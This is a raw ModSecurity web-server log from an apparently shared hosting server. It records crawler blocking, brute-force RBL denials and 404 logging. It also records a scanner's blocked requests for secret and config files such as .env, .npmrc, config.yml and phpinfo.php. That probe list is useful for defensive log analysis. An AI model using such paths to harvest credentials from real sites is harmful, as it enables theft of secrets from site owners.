[Tue May 26 18:49:53.990246 2026] [security2:error] [pid 1025417:tid 1025604] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWd-VHbArxonFeMXvQ0owAAOSQ"]
[Tue May 26 18:49:54.880591 2026] [security2:error] [pid 1025417:tid 1025666] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd-lHbArxonFeMXvQ0rwAAAHc"]
[Tue May 26 18:49:55.322111 2026] [security2:error] [pid 1025417:tid 1025600] [client 114.119.133.30:23213] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahWd-1HbArxonFeMXvQ0uQAAADU"]
[Tue May 26 18:49:55.874530 2026] [security2:error] [pid 1025417:tid 1025466] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/system/info.php"] [unique_id "ahWd-1HbArxonFeMXvQ0xAAASjA"]
[Tue May 26 18:49:55.991694 2026] [security2:error] [pid 1025417:tid 1025469] [remote 51.75.236.158:27706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "yndglobal.com"] [uri "/robots.txt"] [unique_id "ahWd-1HbArxonFeMXvQ0xQAAODM"]
[Tue May 26 18:49:55.991893 2026] [security2:error] [pid 1025417:tid 1025603] [client 51.75.236.158:27706] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "yndglobal.com"] [uri "/robots.txt"] [unique_id "ahWd-1HbArxonFeMXvQ0xQAAODM"]
[Tue May 26 18:49:57.694602 2026] [security2:error] [pid 1025417:tid 1025632] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd_VHbArxonFeMXvQ02gAAAFU"]
[Tue May 26 18:49:57.795688 2026] [security2:error] [pid 1025417:tid 1025485] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/core/info.php"] [unique_id "ahWd_VHbArxonFeMXvQ03wAAZ0M"]
[Tue May 26 18:49:58.920333 2026] [security2:error] [pid 1025417:tid 1025477] [remote 216.73.216.30:36268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWd_lHbArxonFeMXvQ1BQAAeDs"]
[Tue May 26 18:49:59.684249 2026] [security2:error] [pid 1025417:tid 1025482] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/system.php"] [unique_id "ahWd_1HbArxonFeMXvQ1IgAAQ0A"]
[Tue May 26 18:50:00.061791 2026] [security2:error] [pid 1025417:tid 1025549] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWd_1HbArxonFeMXvQ1HgAAAAI"]
[Tue May 26 18:50:00.587344 2026] [security2:error] [pid 1025417:tid 1025601] [client 216.244.66.241:36748] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/intermercurialfaba/adeffc1665993.shtml"] [unique_id "ahWeAFHbArxonFeMXvQ1KgAAADY"]
[Tue May 26 18:50:00.587474 2026] [security2:error] [pid 1025417:tid 1025601] [client 216.244.66.241:36748] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/intermercurialfaba/adeffc1665993.shtml"] [unique_id "ahWeAFHbArxonFeMXvQ1KgAAADY"]
[Tue May 26 18:50:01.729073 2026] [security2:error] [pid 1025417:tid 1025484] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/p.php"] [unique_id "ahWeAVHbArxonFeMXvQ1TgAAV0I"]
[Tue May 26 18:50:02.820641 2026] [security2:error] [pid 1025417:tid 1025610] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeAlHbArxonFeMXvQ1YwAAAD8"]
[Tue May 26 18:50:03.742043 2026] [security2:error] [pid 1025417:tid 1025636] [client 216.244.66.241:36762] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/laborousnessadac/ffcdfa2422387.shtml"] [unique_id "ahWeA1HbArxonFeMXvQ1iQAAAFk"]
[Tue May 26 18:50:03.742200 2026] [security2:error] [pid 1025417:tid 1025636] [client 216.244.66.241:36762] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/laborousnessadac/ffcdfa2422387.shtml"] [unique_id "ahWeA1HbArxonFeMXvQ1iQAAAFk"]
[Tue May 26 18:50:04.202806 2026] [security2:error] [pid 1025417:tid 1025615] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeA1HbArxonFeMXvQ1jgAAAEQ"]
[Tue May 26 18:50:04.365422 2026] [security2:error] [pid 1025417:tid 1025506] [remote 142.44.233.191:39252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "yndglobal.com"] [uri "/"] [unique_id "ahWeBFHbArxonFeMXvQ1nwAALFg"]
[Tue May 26 18:50:04.365650 2026] [security2:error] [pid 1025417:tid 1025591] [client 142.44.233.191:39252] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "yndglobal.com"] [uri "/"] [unique_id "ahWeBFHbArxonFeMXvQ1nwAALFg"]
[Tue May 26 18:50:04.536103 2026] [security2:error] [pid 1025417:tid 1025493] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/_backup/phpinfo.php"] [unique_id "ahWeBFHbArxonFeMXvQ1pwAAP0s"]
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
[Tue May 26 18:50:04.929921 2026] [security2:error] [pid 1025417:tid 1025501] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeBFHbArxonFeMXvQ1rgAAIFM"]
[Tue May 26 18:50:04.930195 2026] [security2:error] [pid 1025417:tid 1025579] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeBFHbArxonFeMXvQ1rgAAIFM"]
[Tue May 26 18:50:06.203550 2026] [security2:error] [pid 1025417:tid 1025505] [remote 92.205.188.156:37230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWeBlHbArxonFeMXvQ1ygAAe1c"]
[Tue May 26 18:50:06.487172 2026] [security2:error] [pid 1025417:tid 1025512] [remote 92.205.188.156:37230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWeBlHbArxonFeMXvQ12gAAZV4"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:50:06.529330 2026] [security2:error] [pid 1025417:tid 1025494] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/scripts/phpinfo.php"] [unique_id "ahWeBlHbArxonFeMXvQ12wAAYEw"]
[Tue May 26 18:50:06.955816 2026] [security2:error] [pid 1025417:tid 1025586] [client 216.244.66.241:57110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/prespontaneouseedb/afdecf960196.shtml"] [unique_id "ahWeBlHbArxonFeMXvQ16gAAACc"]
[Tue May 26 18:50:06.955970 2026] [security2:error] [pid 1025417:tid 1025586] [client 216.244.66.241:57110] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/prespontaneouseedb/afdecf960196.shtml"] [unique_id "ahWeBlHbArxonFeMXvQ16gAAACc"]
[Tue May 26 18:50:07.119147 2026] [security2:error] [pid 1025417:tid 1025610] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeBlHbArxonFeMXvQ14QAAAD8"]
[Tue May 26 18:50:07.448582 2026] [security2:error] [pid 1025417:tid 1025624] [client 157.45.71.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeB1HbArxonFeMXvQ18QAAAE0"]
[Tue May 26 18:50:08.388682 2026] [security2:error] [pid 1025417:tid 1025671] [client 47.128.126.175:58578] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahWeCFHbArxonFeMXvQ2FwAAAHw"]
[Tue May 26 18:50:08.618117 2026] [security2:error] [pid 1025417:tid 1025517] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/sources/.env"] [unique_id "ahWeCFHbArxonFeMXvQ2IgAAQ2M"]
[Tue May 26 18:50:08.854696 2026] [security2:error] [pid 1025417:tid 1025643] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeCFHbArxonFeMXvQ2GgAAAGA"]
[Tue May 26 18:50:10.692237 2026] [security2:error] [pid 1025417:tid 1025527] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/enviroments/.env"] [unique_id "ahWeClHbArxonFeMXvQ2VwAAJ20"]
[Tue May 26 18:50:11.740350 2026] [security2:error] [pid 1025417:tid 1025590] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeC1HbArxonFeMXvQ2ZgAAACs"]
[Tue May 26 18:50:12.540503 2026] [security2:error] [pid 1025417:tid 1025535] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.json"] [unique_id "ahWeDFHbArxonFeMXvQ2iQAAPHU"]
[Tue May 26 18:50:13.501458 2026] [security2:error] [pid 1025417:tid 1025537] [remote 149.18.50.19:33520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.50.18.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWeDVHbArxonFeMXvQ2ogAAVnc"]
[Tue May 26 18:50:14.101500 2026] [security2:error] [pid 1025417:tid 1025587] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeDVHbArxonFeMXvQ2sQAAACg"]
[Tue May 26 18:50:14.420643 2026] [security2:error] [pid 1025417:tid 1025541] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.npmrc"] [unique_id "ahWeDlHbArxonFeMXvQ2wQAARns"]
[Tue May 26 18:50:14.784051 2026] [security2:error] [pid 1025417:tid 1025425] [remote 149.18.50.19:33520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.50.18.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWeDlHbArxonFeMXvQ2zQAAHgc"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:50:15.371323 2026] [security2:error] [pid 1025417:tid 1025542] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeD1HbArxonFeMXvQ24AAAXHw"]
[Tue May 26 18:50:15.371543 2026] [security2:error] [pid 1025417:tid 1025639] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeD1HbArxonFeMXvQ24AAAXHw"]
[Tue May 26 18:50:16.064804 2026] [security2:error] [pid 1025417:tid 1025620] [client 185.191.171.18:45228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-21st/day/2024-09-01/"] [unique_id "ahWeEFHbArxonFeMXvQ27gAAAEk"]
[Tue May 26 18:50:16.064910 2026] [security2:error] [pid 1025417:tid 1025620] [client 185.191.171.18:45228] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-21st/day/2024-09-01/"] [unique_id "ahWeEFHbArxonFeMXvQ27gAAAEk"]
[Tue May 26 18:50:16.251599 2026] [security2:error] [pid 1025417:tid 1025434] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/src/config.js"] [unique_id "ahWeEFHbArxonFeMXvQ2-AAAFBA"]
[Tue May 26 18:50:16.849000 2026] [security2:error] [pid 1025417:tid 1025574] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeEFHbArxonFeMXvQ2_gAAABs"]
[Tue May 26 18:50:18.133571 2026] [security2:error] [pid 1025417:tid 1025540] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/src/config.php"] [unique_id "ahWeElHbArxonFeMXvQ3IQAAJno"]
[Tue May 26 18:50:20.000471 2026] [security2:error] [pid 1025417:tid 1025438] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config.yml"] [unique_id "ahWeE1HbArxonFeMXvQ3SQAAfhQ"]
[Tue May 26 18:50:20.440270 2026] [security2:error] [pid 1025417:tid 1025583] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeE1HbArxonFeMXvQ3SAAAACQ"]
[Tue May 26 18:50:21.028409 2026] [security2:error] [pid 1025417:tid 1025435] [remote 57.141.2.10:39050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWeFFHbArxonFeMXvQ3YgAAYxE"]
[Tue May 26 18:50:21.732642 2026] [security2:error] [pid 1025417:tid 1025617] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeFVHbArxonFeMXvQ3bAAAAEY"]
[Tue May 26 18:50:21.934155 2026] [security2:error] [pid 1025417:tid 1025442] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config.py"] [unique_id "ahWeFVHbArxonFeMXvQ3eAAAHhg"]
[Tue May 26 18:50:23.548894 2026] [security2:error] [pid 1025417:tid 1025646] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeF1HbArxonFeMXvQ3nwAAAGM"]
[Tue May 26 18:50:23.924727 2026] [security2:error] [pid 1025417:tid 1025459] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/app/config/environment.php"] [unique_id "ahWeF1HbArxonFeMXvQ3tgAAMyk"]
[Tue May 26 18:50:25.388121 2026] [security2:error] [pid 1025417:tid 1025585] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeGFHbArxonFeMXvQ31wAAACY"]
[Tue May 26 18:50:25.870853 2026] [security2:error] [pid 1025417:tid 1025466] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/backend/mail.php"] [unique_id "ahWeGVHbArxonFeMXvQ38AAAKzA"]
[Tue May 26 18:50:26.125683 2026] [security2:error] [pid 1025417:tid 1025469] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeGlHbArxonFeMXvQ3-AAAOzM"]
[Tue May 26 18:50:26.125855 2026] [security2:error] [pid 1025417:tid 1025606] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeGlHbArxonFeMXvQ3-AAAOzM"]
[Tue May 26 18:50:27.867947 2026] [security2:error] [pid 1025417:tid 1025558] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeG1HbArxonFeMXvQ4GQAAAAs"]
[Tue May 26 18:50:27.999407 2026] [security2:error] [pid 1025417:tid 1025594] [client 66.249.64.172:50668] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWeGlHbArxonFeMXvQ4CgAAAC8"], referer: https://doyecpa.com/prizes/284202612
[Tue May 26 18:50:30.317784 2026] [security2:error] [pid 1025417:tid 1025557] [client 202.55.67.194:53298] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahWeHVHbArxonFeMXvQ4WwAAAAo"]
